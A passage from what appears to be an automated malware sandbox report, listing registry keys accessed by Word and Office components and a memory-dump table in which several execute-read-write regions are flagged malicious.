HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\702AF
702AF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\702AF
702AF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
ZoomApp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
There are 458 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
5B60000
direct allocation
page execute and read and write
malicious
33F0000
unkown
page execute and read and write
malicious
5340000
direct allocation
page execute and read and write
malicious
4660000
direct allocation
page execute and read and write
malicious
49E0000
direct allocation
page execute and read and write
malicious
7A0000
system
page execute and read and write
malicious
C30000
system
page execute and read and write
malicious
5B90000
direct allocation
page execute and read and write
malicious
5360000
direct allocation
page execute and read and write
malicious
7A0000
system
page execute and read and write
malicious
FA0000
system
page execute and read and write
malicious
FA0000
system
page execute and read and write
malicious
3420000
unkown
page execute and read and write
malicious
2C30000
direct allocation
page execute and read and write
malicious
5310000
direct allocation
page execute and read and write
malicious
2C30000
direct allocation
page execute and read and write
malicious
3440000
unkown
page execute and read and write
malicious
C30000
system
page execute and read and write
malicious
7FD0000
direct allocation
page read and write
9100000
trusted library allocation
page read and write
A8E000
stack
page read and write
CA1427B000
stack
page read and write
8CB0000
unkown
page read and write
AB10000
trusted library allocation
page read and write
8DD8000
trusted library allocation
page read and write
90EA37E000
stack
page read and write
7020000
trusted library allocation
page read and write
8D91000
trusted library allocation
page read and write
8CB5000
trusted library allocation
page read and write
4607000
unkown
page read and write
AB20000
trusted library allocation
page read and write
7340000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
8F70000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
32A4000
heap
page read and write
4DA0000
direct allocation
page read and write
8E10000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
9C50000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
4270000
unkown
page readonly
A916000
trusted library allocation
page read and write
8E50000
trusted library allocation
page read and write
5380000
heap
page read and write
2230F380000
heap
page read and write
AB43000
trusted library allocation
page read and write
1FA26F00000
heap
page read and write
8E10000
trusted library allocation
page read and write
B454000
trusted library allocation
page read and write
9020000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
2CA3A258000
heap
page read and write
9030000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
73C4000
trusted library allocation
page read and write
28EA5688000
heap
page read and write
6B60000
trusted library allocation
page read and write
91B4000
trusted library allocation
page read and write
6BF0000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
7DCE000
unkown
page read and write
AB47000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
5470000
direct allocation
page read and write
1A32B750000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
9160000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
9D000
stack
page read and write
B80000
remote allocation
page read and write
4AA0000
trusted library allocation
page read and write
AB20000
trusted library allocation
page read and write
AB40000
trusted library allocation
page read and write
6BE0000
trusted library allocation
page read and write
8EC0000
trusted library allocation
page read and write
4BC0000
trusted library allocation
page read and write
988000
heap
page read and write
6D10000
trusted library allocation
page read and write
8D60000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
7DC0000
unkown
page read and write
9160000
unkown
page read and write
8E40000
trusted library allocation
page read and write
8EC8000
trusted library allocation
page read and write
9EC0000
trusted library allocation
page read and write
6CF9000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
55B1000
heap
page read and write
323B000
stack
page read and write
6CD0000
trusted library allocation
page read and write
1B54EE4A000
heap
page read and write
2FB0000
direct allocation
page read and write
C0B000
heap
page read and write
7DC0000
unkown
page read and write
6CD0000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
54CC000
trusted library allocation
page read and write
9D20000
trusted library allocation
page read and write
1671785A000
heap
page read and write
8D80000
trusted library allocation
page execute and read and write
8E30000
trusted library allocation
page read and write
8E60000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
7020000
trusted library allocation
page read and write
2648000
heap
page read and write
580000
remote allocation
page read and write
6AC0000
direct allocation
page read and write
A950000
trusted library allocation
page read and write
556F000
direct allocation
page read and write
A7E5EFD000
stack
page read and write
8F70000
unkown
page read and write
52C5000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
8DF0000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
14CD583A000
heap
page read and write
C0B000
heap
page read and write
350000
heap
page read and write
73B0000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
90EA07E000
stack
page read and write
7DC6000
trusted library allocation
page read and write
B88000
heap
page read and write
9070000
unkown
page read and write
8E00000
trusted library allocation
page read and write
14CD5860000
heap
page read and write
6D60000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
AC20000
trusted library allocation
page read and write
4387000
unkown
page read and write
ABC0000
trusted library allocation
page read and write
90EA77A000
stack
page read and write
8E50000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
3B8000
stack
page read and write
4F0000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
9C50000
trusted library allocation
page read and write
AA0000
heap
page read and write
73C0000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
8CB5000
unkown
page read and write
9D5D000
stack
page read and write
73D0000
trusted library allocation
page read and write
1A32B879000
heap
page read and write
8D90000
trusted library allocation
page read and write
B00B000
trusted library allocation
page read and write
37DB27B000
stack
page read and write
90F000
stack
page read and write
A928000
trusted library allocation
page read and write
7DC5000
unkown
page read and write
99B000
heap
page read and write
5472000
direct allocation
page read and write
8E30000
trusted library allocation
page read and write
7250000
trusted library allocation
page read and write
2C50000
heap
page read and write
1B54EE3D000
heap
page read and write
2230F45B000
heap
page read and write
B4DE000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
EF5000
heap
page read and write
B351000
trusted library allocation
page read and write
9CD0000
trusted library allocation
page execute and read and write
8DF0000
trusted library allocation
page read and write
AB40000
trusted library allocation
page read and write
8F00000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
6D10000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
1FA26F02000
heap
page read and write
9CA0000
trusted library allocation
page read and write
7DC6000
trusted library allocation
page read and write
2230FE02000
trusted library allocation
page read and write
AFEA000
trusted library allocation
page read and write
9050000
trusted library allocation
page read and write
AB20000
trusted library allocation
page read and write
9EB0000
trusted library allocation
page read and write
9CE0000
trusted library allocation
page read and write
14CD6002000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
8E15000
trusted library allocation
page read and write
8F50000
trusted library allocation
page read and write
4BEF000
heap
page read and write
AB50000
trusted library allocation
page read and write
9A0000
direct allocation
page execute and read and write
8F30000
trusted library allocation
page read and write
3FB000
stack
page read and write
6CF6000
trusted library allocation
page read and write
153A77F000
stack
page read and write
DE0000
heap
page read and write
6BE0000
trusted library allocation
page read and write
8097000
trusted library allocation
page read and write
1B54EBC0000
heap
page read and write
2230F492000
heap
page read and write
6CB0000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
28DD526D000
heap
page read and write
9040000
trusted library allocation
page read and write
50E0000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
8E70000
trusted library allocation
page read and write
8CD0000
trusted library allocation
page read and write
9C30000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
546F000
heap
page read and write
8C78000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
9110000
unkown
page read and write
7DC0000
trusted library allocation
page read and write
55E5000
heap
page read and write
8E10000
trusted library allocation
page read and write
9C50000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
7D2000
direct allocation
page read and write
8ED0000
trusted library allocation
page read and write
C60000
remote allocation
page read and write
1A32B650000
heap
page read and write
6D50000
trusted library allocation
page read and write
8EE0000
trusted library allocation
page read and write
9002000
trusted library allocation
page read and write
7020000
trusted library allocation
page read and write
AA8000
heap
page read and write
7081000
heap
page read and write
D1E000
stack
page read and write
6D30000
trusted library allocation
page read and write
460A000
unkown
page readonly
9115000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
EAF000
heap
page read and write
8D90000
trusted library allocation
page read and write
EE0000
heap
page read and write
AB40000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
19C000
stack
page read and write
9EF0000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
43E0000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
1A330E30000
trusted library allocation
page read and write
1A32CC60000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
8E80000
trusted library allocation
page read and write
6D00000
trusted library allocation
page read and write
34AF000
heap
page read and write
1A32B913000
heap
page read and write
7DC0000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
125FC9A0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
8F70000
unkown
page read and write
8E10000
trusted library allocation
page read and write
C5EDF9B000
stack
page read and write
35EE000
stack
page read and write
16717620000
heap
page read and write
8EF0000
trusted library allocation
page read and write
2C5A000
heap
page read and write
8F60000
trusted library allocation
page read and write
7240000
trusted library allocation
page read and write
DED10FE000
stack
page read and write
6D80000
trusted library allocation
page read and write
9000000
trusted library allocation
page execute and read and write
5D81000
heap
page read and write
260000
unkown
page readonly
9CC0000
trusted library allocation
page read and write
C60000
remote allocation
page read and write
6F16000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
7ED0000
unkown
page read and write
457E000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
6BE0000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
108C000
stack
page read and write
1B5507E0000
remote allocation
page read and write
9CB0000
trusted library allocation
page read and write
8E80000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
DED15FD000
stack
page read and write
9C50000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page execute and read and write
8CC0000
trusted library allocation
page read and write
9C64000
trusted library allocation
page read and write
4D6E000
stack
page read and write
6BE0000
unkown
page read and write
14CD5876000
heap
page read and write
54DD000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
8E50000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
73A0000
trusted library allocation
page read and write
4560000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
1A331082000
heap
page read and write
8ED0000
trusted library allocation
page read and write
91F0000
unkown
page read and write
6CE0000
trusted library allocation
page read and write
1A330F50000
trusted library allocation
page read and write
580000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
7DC5000
trusted library allocation
page read and write
8EE0000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
EF43FE000
stack
page read and write
AF0000
trusted library allocation
page read and write
8E80000
trusted library allocation
page read and write
1FA26B90000
heap
page read and write
7DD0000
trusted library allocation
page read and write
1A3310FD000
heap
page read and write
8D30000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
A60000
heap
page read and write
984000
heap
page read and write
7EF0000
trusted library allocation
page read and write
5B0000
heap
page read and write
8CB0000
trusted library allocation
page read and write
4CC0000
trusted library allocation
page read and write
1A32C100000
heap
page read and write
8E10000
trusted library allocation
page read and write
59E000
stack
page read and write
B48D000
trusted library allocation
page read and write
8F00000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
4A8D000
stack
page read and write
90EA47A000
stack
page read and write
125FCA77000
heap
page read and write
9CC0000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
2F52000
unkown
page read and write
9240000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
4F4F000
stack
page read and write
1A3310DC000
heap
page read and write
953000
heap
page read and write
8EC0000
trusted library allocation
page read and write
8E20000
trusted library allocation
page read and write
9C20000
trusted library allocation
page read and write
8E20000
trusted library allocation
page read and write
9098000
trusted library allocation
page read and write
8CE6000
trusted library allocation
page read and write
6CC0000
direct allocation
page read and write
7DD0000
trusted library allocation
page read and write
8CD5000
trusted library allocation
page read and write
9C9E000
trusted library allocation
page read and write
DED127E000
stack
page read and write
8DF0000
trusted library allocation
page execute and read and write
8EA0000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
8E60000
trusted library allocation
page read and write
AB30000
trusted library allocation
page read and write
9083000
trusted library allocation
page read and write
8E89000
trusted library allocation
page read and write
1A330E20000
trusted library allocation
page read and write
73B0000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
90EA4FF000
stack
page read and write
8E10000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
1A32B7E3000
trusted library allocation
page read and write
16718002000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
6BE0000
trusted library allocation
page read and write
9C30000
trusted library allocation
page read and write
6F20000
trusted library allocation
page read and write
37DABFB000
stack
page read and write
8EE0000
trusted library allocation
page read and write
8EE0000
trusted library allocation
page read and write
8E20000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
8C65000
trusted library allocation
page read and write
967F000
stack
page read and write
AB40000
trusted library allocation
page read and write
2230F500000
heap
page read and write
AB20000
trusted library allocation
page read and write
6BE0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
7F10000
trusted library allocation
page read and write
5390000
trusted library allocation
page read and write
107F000
stack
page read and write
559E000
heap
page read and write
8CC0000
trusted library allocation
page read and write
93F000
heap
page read and write
A10000
heap
page read and write
9CB0000
trusted library allocation
page read and write
1A33102B000
heap
page read and write
8CB9000
trusted library allocation
page read and write
7DC6000
trusted library allocation
page read and write
2E41000
unkown
page execute read
55FB000
heap
page read and write
8F30000
trusted library allocation
page read and write
28DD4FE0000
heap
page read and write
790000
remote allocation
page read and write
AB30000
trusted library allocation
page read and write
90EA67C000
stack
page read and write
9CA0000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
9170000
trusted library allocation
page read and write
8D20000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
55E5000
heap
page read and write
8D00000
trusted library allocation
page read and write
8CE0000
trusted library allocation
page read and write
AB40000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
7390000
trusted library allocation
page read and write
1FA26F13000
heap
page read and write
AB80000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
4E80000
heap
page read and write
54E1000
heap
page read and write
8DF0000
trusted library allocation
page read and write
7F10000
trusted library allocation
page read and write
4D90000
heap
page read and write
AB10000
trusted library allocation
page read and write
5607000
heap
page read and write
2230F464000
heap
page read and write
9030000
trusted library allocation
page read and write
7EF0000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
32A4000
heap
page read and write
9CF0000
trusted library allocation
page read and write
F90000
remote allocation
page read and write
8070000
trusted library allocation
page read and write
A20000
heap
page read and write
7DC5000
unkown
page read and write
1A3310F4000
heap
page read and write
73E0000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
1A32B800000
heap
page read and write
9CB0000
trusted library allocation
page read and write
8E00000
trusted library allocation
page read and write
2230F451000
heap
page read and write
9CE0000
trusted library allocation
page read and write
8EC0000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
9130000
trusted library allocation
page read and write
7D0000
remote allocation
page read and write
9CB0000
trusted library allocation
page read and write
5600000
heap
page read and write
771000
direct allocation
page read and write
AB10000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
32A0000
heap
page read and write
6F50000
trusted library allocation
page read and write
984000
heap
page read and write
8E20000
trusted library allocation
page read and write
4ABD000
stack
page read and write
EAF000
heap
page read and write
B45000
heap
page read and write
8DD0000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
FD0D87F000
stack
page read and write
91F0000
trusted library allocation
page read and write
28EA5629000
heap
page read and write
16717875000
heap
page read and write
28DD5A02000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
941000
heap
page read and write
7020000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
9070000
trusted library allocation
page read and write
8DB0000
trusted library allocation
page read and write
AC10000
trusted library allocation
page read and write
943E000
unkown
page read and write
9CC0000
trusted library allocation
page read and write
55A0000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
ABD0000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
7DD0000
unkown
page read and write
7DC0000
trusted library allocation
page read and write
AC60000
trusted library allocation
page read and write
8CB5000
trusted library allocation
page read and write
2CA3A213000
heap
page read and write
8CB5000
trusted library allocation
page read and write
B3E0000
trusted library allocation
page read and write
73B0000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
7024000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
963E000
stack
page read and write
7DD0000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
8DC0000
trusted library allocation
page read and write
8E10000
trusted library allocation
page read and write
B9C000
heap
page read and write
9C30000
trusted library allocation
page read and write
B0C6000
trusted library allocation
page read and write
100000
heap
page read and write
2AA0000
direct allocation
page read and write
4B0C000
stack
page read and write
C0000
remote allocation
page read and write
73D0000
trusted library allocation
page read and write
AB50000
trusted library allocation
page read and write
AB10000
trusted library allocation
page read and write
AB70000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
3410000
heap
page read and write
7240000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page read and write
1A330DFE000
trusted library allocation
page read and write
9C79000
trusted library allocation
page read and write
9030000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
7340000
trusted library allocation
page read and write
9EF0000
trusted library allocation
page read and write
BB8000
heap
page read and write
8E00000
trusted library allocation
page read and write
5D5F000
heap
page read and write
2230F370000
heap
page read and write
ACD0000
trusted library allocation
page read and write
9020000
trusted library allocation
page read and write
9E20000
trusted library allocation
page read and write
49BE000
stack
page read and write
103E000
stack
page read and write
32A4000
heap
page read and write
8CE0000
trusted library allocation
page read and write
8E14000
trusted library allocation
page read and write
55CD000
heap
page read and write
9010000
trusted library allocation
page read and write
941000
heap
page read and write
DED0E7B000
stack
page read and write
620000
remote allocation
page read and write
7DCF000
trusted library allocation
page read and write
28EA5F00000
heap
page read and write
8E80000
trusted library allocation
page read and write
AB30000
trusted library allocation
page read and write
7DC0000
unkown
page read and write
8D80000
trusted library allocation
page read and write
D9E000
stack
page read and write
94E000
stack
page read and write
288E000
stack
page read and write
73C0000
trusted library allocation
page read and write
8E33000
trusted library allocation
page read and write
6CE0000
trusted library allocation
page read and write
DED137D000
stack
page read and write
8E00000
trusted library allocation
page read and write
723C000
stack
page read and write
73E0000
trusted library allocation
page read and write
C78000
heap
page read and write
905D000
